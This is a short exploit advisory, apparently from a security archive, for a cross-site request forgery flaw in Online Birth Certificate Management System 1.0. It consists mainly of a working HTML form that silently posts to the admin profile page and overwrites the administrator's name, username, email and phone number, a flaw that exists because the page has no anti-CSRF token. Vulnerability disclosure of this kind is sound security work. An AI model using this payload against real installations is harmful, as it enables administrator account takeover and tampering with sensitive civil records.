Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Online Birth Certificate Management System 1.0 Cross Site Request Forgery
Posted Sep 27, 2022
Authored by Yousef Alraddadi
Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.
tags | exploit, csrf
SHA-256 | f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# no token in update profile admin

<html>
<head>
<title> CSRF update Profile </title>
</head>
<body>
<form action=”http://localhost/OBCMS/admin/profile.php” method=”post” enctype=”multipart/form-data”>
<input type=”hidden” name=”adminname” value=”csrf111″>
<input type=”hidden” name=”username” value=”csrf”>
<input type=”hidden” name=”email” value=”csrf”>
<input type=”hidden” name=”mobilenumber” value=”0″>
<button class=”btn btn-sm btn-primary login-submit-cs” type=”submit” name=”submit”>Save Change</button>
</form>
</body>
</html>